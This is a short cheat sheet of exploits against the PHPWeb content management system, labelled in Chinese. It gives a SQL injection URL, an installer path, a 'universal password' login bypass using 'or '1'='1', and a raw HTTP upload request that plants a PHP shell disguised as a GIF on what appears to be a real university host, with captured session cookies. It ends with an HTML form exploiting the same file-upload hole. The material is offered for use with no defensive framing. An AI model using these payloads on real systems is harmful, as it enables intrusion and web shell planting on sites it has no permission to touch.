【sqlinjection】
http://www.phpweb.net/down/class/index.php?myord=1
【getshell】
POST /kedit/upload_cgi/upload.php HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* Referer: http://www.phpweb.net/news/admin/new ... p;pid=allpage= Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7db516c0118 UA-CPU: x86 Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: lib.jlnu.edu.cn Proxy-Connection: Keep-Alive Cookie: CODEIMG=6878; SYSZC=c7646d833635a773e6a89e364d9f0eca; SYSUSER=wlf; SYSNAME=%E7%8E%8B%E7%AB%8B%E5%B3%B0; SYSUSERID=15; SYSTM=1318373657- D1 F$ M( R3 _8 {3 U. V Content-Length: 6620 -----------------------------7db516c0118 Content-Disposition: form-data; name="fileName" 201110121318373662005.php;.jpg -----------------------------7db516c0118 Content-Disposition: form-data; name="attachPath" news/pics/ -----------------------------7db516c0118 Content-Disposition: form-data; name="fileData"; filename="C:\6.gif" Content-Type: image/gif gif89a ');?>
【安装文件】
http://www.phpweb.com/base/install/
【万能密码】
http://www.phpweb.com/admin.php
username: admin ‘or ‘1’=’1
password: admin ‘or ‘1’=’1
【上传漏洞】(exp上传shell.php.jpg):
<form name="uploadForm" style="margin:0;padding:0;" method="post" enctype="multipart/form-data" action="http://www.phpweb.com/maq/upload.php"> <input type="hidden" name="fileName" id="fileName" value="shell.php;.jpg" /> <input type="hidden" name="attachPath" id="fileName" value="maq/pics/" /> <input type="file" name="fileData" id="imgFile" size="14″ style="border:1px solid #555555;"> <input type="submit" name="button" id="KE_IMAGEsubmitButton" value="上传" style="border:1px solid #555555;background-color:#AAAAAA;" /> </form>